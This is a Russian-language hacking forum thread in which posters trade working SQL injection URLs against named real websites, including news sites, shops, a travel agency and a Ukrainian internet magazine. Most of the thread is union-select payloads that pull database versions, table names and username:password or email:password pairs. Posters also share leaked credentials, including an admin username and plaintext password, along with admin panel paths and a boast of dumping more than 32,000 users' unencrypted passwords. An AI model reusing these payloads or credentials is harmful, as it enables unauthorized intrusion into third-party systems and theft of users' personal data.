SQL Инъекции

Там вобще какая-то странная скуля =\

НО :

 

Code:

http://www.stpatsfc.com/news.php?id=-1463+union+select+1,2,3,4,concat(password,0x3a,email),6+from+members/*

http://stpatsfc.com/admin/ меня наверное глючит но на админке нету пароля))))))))

 

clubclass04: pillocks

Code:

http://www.glidingteam.co.uk/competitions/2006/nzgrandprix/viewnewsarticle.php?id=-184+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15+from+users/*

-

Code:

http://www.karmichaelhr.com/pages/viewnewsarticle.php?article=6+union+select+1,concat(database(),0x3a,version()),3,4/*

 

сим-рейсинг

 

гы а я тут как то участвовал)) дальше не полезу, носков нету, а то забанят ещё)

 

в самом низу

 

Code:

http://www.tass-ural.ru/news/?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schema.tables+limit+52,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schema.tables+limit+55,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,column_name+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114)+limit+0,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,convert(concat(id,char(58),fio,char(58),job),char)+from+member+limit+0,1/*

Code:

http://www.skladcd.com/?index=3&cat=4&cdinfo=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4/*

 

Code:

http://www.marycoughlanmusic.com/shop.php?id=-47%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12+from+admin/*

чето нигде не выводит

 

всё там нормально

 

Code:

http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,VERSION(),9,10,11,12,13,14,15,16,17,18,19/*
http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,DATABASE(),9,10,11,12,13,14,15,16,17,18,19/*
http://www.yarnovosti.com/index.php?mod=news&cid=4&id=8262-4+union+select+1,2,3,4,5,6,7,USER(),9,10,11,12,13,14,15,16,17,18,19/*

Ярновасти...

 

Code:

http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5/*
http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(concat(user,char(58),password),char),3,4,5+from+mysql.user+limit+0,1/*
http://www.gapr.ru/RUS/news.php?newsID=100000000+union+select+1,convert(concat(id,char(58),email,char(58),passwd),char),3,4,5+from+user/*

 

www.internetua.com - украинский журнал об Интернете

Code:

http://www.internetua.com/vote/?v2=-1+union+select+1,2,3,4,5,6,7,8/*

Админка

Code:

http://www.internetua.com/admin/

Кто расковыряет дальше, отпишите..

 

О, моя самая жирная скуля!!!

Более 32 000 юзеров!
Пасы без шифроовки!
mail : pass

 

to Goudini

Code:

http://www.internetua.com/vote/?v2=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(database(),char(58),user(),char(58),version()),0x71),0x71),3,4,5,6,7,8/*
http://www.internetua.com/vote/?v2=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(table_name,0x71),0x71),3,4,5,6,7,8+from+information_schema.tables+limit+16,1/*

 

Code:

http://www.phpvillage.org/member.php?idu=-1755+union+select+1,2,concat(version(),char(58),user()),4,5,6,7,8,9,10,11,12,13,14,15/*

Code:

http://www.x-cosmos.it/uffici/index.php?idU=-45+union+select+1,2/*

 

Code:

http://www.vokrugsveta.ru/publishing/vs/archives/?item_id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11/*

Code:

http://www.metallomarket-m.ru/produkt.php?type_id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6/*

 

Code:

http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,database(),4,5,6,7,8/*
http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,user(),4,5,6,7,8/*
http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,Version(),4,5,6,7,8/*

 

www.rssmix.com/

Code:

http://www.rssmix.com/engine.php?mix_id=-20476/**/union/**/select/**/concat(user,0x3a,password)/**/from+mysql.user/*

Пасса походу нет =\

 

HTML:

http://gta.com.ua/file_details.phtml?id=-802+union+select+1,2,3,concat(user(),char(58),database(),char(58),version()),5,6,7,username,password,10,11,12,13,14,15,16,17,18,19,20+from+admin/*

username == admin
password == 2IsfJILPkOJ2
user == gtacom_gta@localhost
database == gtacom_gta
version == 4.1.21-standard

Хз где админка можно залесть так:
http://domen.com.ua/
Только нужен id


Тур агентство.

HTML:

http://sputnik.kiev.ua/catalog/index.php?turs=18&id_c=-33+union+select+1,concat(version(),char(58),user(),char(58),database())/*

 

____